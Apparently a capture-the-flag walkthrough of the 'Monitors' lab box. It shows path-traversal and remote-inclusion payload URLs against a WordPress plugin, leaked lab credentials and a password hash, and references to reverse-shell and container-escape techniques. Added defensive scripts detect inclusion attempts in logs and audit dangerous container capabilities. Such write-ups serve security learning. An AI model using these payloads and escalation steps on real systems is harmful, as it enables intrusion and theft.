Machine - Monitors - Hard

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
$  nmap -sC -sV -p80,22  10.10.10.238 -Pn -oN  ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ nmap -sV --script=http-enum -p80 10.10.10.238

Exploratory

SSH doesn’t seem vulnerable. HTTP returns:

Sorry, direct IP access is not allowed.

If you are having issues accessing the site then contact the website administrator: admin@monitors.htb

Add monitors.htb to the hosts file.

We see a WordPress 5.5.0 install :)

WordPress vuln?

Fuzz using https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/wordpress.fuzz.txt and curl https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt > wp-plugins.tx

Plugins: nothing interesting found… Themes: nothing interesting found.

Looking at the page source, I see the site uses the Spritz plugin (wp-with-spritz).

There is a file inclusion in it (local via traversal, and remote) :)

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
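On the detection side, as an added example that is not part of the original notes: a small Python script that scans Apache access log lines (common log format) for requests to the plugin's wp.spritz.content.filter.php whose url= parameter carries a traversal sequence, an absolute local path, a non-HTTP scheme, or a remote host outside an allowlist. The log lines, the 10.10.14.x client addresses and the monitors.htb allowlist are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Plugin endpoint seen in the notes above.
SPRITZ_PATH = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"

# Hosts the plugin may legitimately fetch from (assumption made for this example).
ALLOWED_HOSTS = frozenset({"monitors.htb", "www.monitors.htb"})

# Apache "common" log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not taken from the box's real logs).
SAMPLE_LOG = """\
10.10.14.5 - - [12/Oct/2021:10:01:02 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 2145
10.10.14.5 - - [12/Oct/2021:10:01:09 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.5/exec HTTP/1.1" 200 512
10.10.14.5 - - [12/Oct/2021:10:01:15 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%2Fetc%2Flsb-release HTTP/1.1" 200 118
192.168.1.20 - - [12/Oct/2021:10:02:00 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://monitors.htb/2021/10/some-post/ HTTP/1.1" 200 9001
192.168.1.21 - - [12/Oct/2021:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 7321
"""


def classify_url_param(value, allowed_hosts=ALLOWED_HOSTS):
    """Label one url= value (already decoded once by parse_qs), or None if benign."""
    # Decode a second time so double-encoded traversal (%252e%252e) is also caught.
    v = unquote(value)
    low = v.lower()
    if "../" in low or "..\\" in low:
        return "path-traversal"
    m = re.match(r"^([a-z][a-z0-9+.\-]+):", low)
    if m:
        if m.group(1) in ("http", "https"):
            host = (urlsplit(v).hostname or "").lower()
            return None if host in allowed_hosts else "remote-inclusion"
        # file:, php:, data: and similar schemes have no legitimate use here.
        return "stream-wrapper"
    if low.startswith("/") or low.startswith("\\"):
        return "local-file-read"
    return None


def scan_log(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (client_ip, label, url_value) for every suspicious plugin request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != SPRITZ_PATH:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("url", []):
            label = classify_url_param(value, allowed_hosts)
            if label:
                findings.append((m.group("ip"), label, value))
    return findings


if __name__ == "__main__":
    for ip, label, value in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {label:17} url={value}")
```

The same classifier can be fed from `tail -f` on the live access log; the check on the decoded value is what matters, since a WAF rule that only looks for a literal `../` misses the percent-encoded form in the third sample line.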

Let’s also check the hostnames, since I think there are multiple vhosts… (no luck). Files read through the inclusion:

/etc/lsb-release:

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"

wp-config.php:

define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
Apache virtual host config (the Cacti vhost):

#ServerName www.example.com
	ServerAdmin admin@monitors.htb
	ServerName cacti-admin.monitors.htb
	DocumentRoot /usr/share/cacti
	ServerAlias cacti-admin.monitors.htb
	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn
	ErrorLog /var/log/cacti-error.log
	CustomLog /var/log/cacti-access.log common
	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf

On cacti-admin.monitors.htb we can log in as admin with the database password..

Searchsploit also lists a vuln for this Cacti version with an exploit that opens a shell via nc.

from www-data to …
  • ps
  1355 ?        Ssl    0:00 /usr/bin/containerd
  1373 ?        Ssl    0:00 /usr/lib/policykit-1/polkitd --no-debug
  1420 tty1     Ss+    0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
  1496 ?        Sl     0:03 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
  1512 ?        Ss     0:00 /usr/sbin/apache2 -k start
  1586 ?        Ssl    0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
  2091 ?        Sl     0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8443 -container-ip 172.17.0.2 -container-port 8443
  2102 ?        Sl     0:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/109e2d8f43c5a10ddb0b3b823c3c1efc095a7c76b4397c73c4a14c6de917d0a4 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
  2135 ?        Ssl    0:05 /usr/local/openjdk-8/bin/java -Dorg.gradle.appname=gradlew -classpath /usr/src/apache-ofbiz-17.12.01/gradle/wrapper/gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain --offline ofbiz
  2309 ?        Ssl    0:50 /usr/local/openjdk-8/bin/java -XX:MaxPermSize=256m -XX:+HeapDumpOnOutOfMemoryError -Xmx1024m -Dfile.encoding=UTF-8 -Duser.country -Duser.language=en -Duser.variant -cp /root/.gradle/wrapper/dists/gradle-3.2.1-bin/erlz51pt56t1o6vc7t39cikug/gradle-3.2.1/lib/gradle-launcher-3.2.1.jar org.gradle.launcher.daemon.bootstrap.GradleDaemon 3.2.1
  2361 ?        Sl     1:38 /usr/local/openjdk-8/bin/java -Xms128M -Xmx1024M -Dfile.encoding=UTF-8 -Duser.country -Duser.language=en -Duser.variant -cp /usr/src/apache-ofbiz-17.12.01/build/libs/ofbiz.jar org.apache.ofbiz.base.start.Start

we see:

  • docker on port 8443

  • java

  • ports:
      – 3306 >> mysql >> the WordPress admin user’s hash $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 >> tried to crack it with john >> no luck :’(
      – 8443 >> ?

  • in marcus’s home folder there is a .backup folder that I cannot read

An OFBiz 17.12.01 is running as root (maybe in the docker container?) and is vulnerable! For that, first … I will use chisel to forward port 8443 to my localhost.

Got it: I have a shell as root, but I am inside a container :(

capsh --print shows that I have cap_sys_module.

With this capability we can load kernel modules into the host kernel (shared with the container): we crafted a kernel module that gives us a reverse shell.. https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_module

Kernel (uname -a):

Linux monitors 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
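On the defender side, as an added example that is not part of the original notes: a Python audit that decodes the effective capability set of a container process, either from the CapEff hex mask in /proc/<pid>/status or from the Current: line of capsh --print, and flags capabilities such as cap_sys_module that let a process load code into the shared host kernel. The status excerpt and the capsh line are constructed to resemble a container started with an extra SYS_MODULE capability; the high-risk list is my own selection, and Docker's default mask is the documented value for an unprivileged container.

```python
import re

# Capability numbers from linux/capability.h; the list index is the bit in CapEff.
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Capabilities that let a process load code into the host kernel, bypass
# namespace isolation or read arbitrary host memory/files. A container
# workload should not hold any of them (selection made for this example).
HIGH_RISK = frozenset({"sys_module", "sys_admin", "sys_rawio", "sys_ptrace",
                       "dac_read_search", "bpf"})

# Docker's default effective set for an unprivileged container (14 capabilities).
DOCKER_DEFAULT_CAPEFF = "00000000a80425fb"

# Constructed /proc/<pid>/status excerpt: Docker defaults plus cap_sys_module (bit 16).
SAMPLE_STATUS = """\
Name:\tbash
Uid:\t0\t0\t0\t0
CapInh:\t0000000000000000
CapPrm:\t00000000a80525fb
CapEff:\t00000000a80525fb
CapBnd:\t00000000a80525fb
CapAmb:\t0000000000000000
"""

# Constructed `capsh --print` output for the same process (libcap 2.25 style line).
SAMPLE_CAPSH = (
    "Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,"
    "cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,"
    "cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip\n"
    "Bounding set =cap_chown,cap_dac_override,cap_fowner\n"
)


def caps_from_mask(hex_mask):
    """Expand a CapEff/CapBnd hex mask into a set of cap_* names."""
    mask = int(hex_mask, 16)
    return {f"cap_{name}" for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1}


def caps_from_status(status_text):
    """Read the effective set from the CapEff line of /proc/<pid>/status."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.M)
    if m is None:
        raise ValueError("no CapEff line in status text")
    return caps_from_mask(m.group(1))


def caps_from_capsh(capsh_text):
    """Read the current set from the first line of `capsh --print` (old or new format)."""
    m = re.search(r"^Current:(.*)$", capsh_text, re.M)
    if m is None:
        raise ValueError("no Current: line in capsh output")
    return set(re.findall(r"cap_[a-z_]+", m.group(1)))


def audit(caps):
    """Return the high-risk capabilities present, sorted."""
    return sorted(c for c in caps if c[len("cap_"):] in HIGH_RISK)


def beyond_default(caps):
    """Return capabilities beyond Docker's default set, i.e. ones someone added explicitly."""
    return sorted(caps - caps_from_mask(DOCKER_DEFAULT_CAPEFF))


if __name__ == "__main__":
    effective = caps_from_status(SAMPLE_STATUS)
    print("effective:", ", ".join(sorted(effective)))
    print("beyond docker default:", beyond_default(effective))
    print("high risk:", audit(effective))
```

Inside a container, `cat /proc/self/status` gives the same CapEff line as the constructed sample. A non-empty result from audit() means the container was started with --cap-add or --privileged; the fix is on the host side, by starting it without that capability, since no in-container hardening can take the capability back from a root process that already has it.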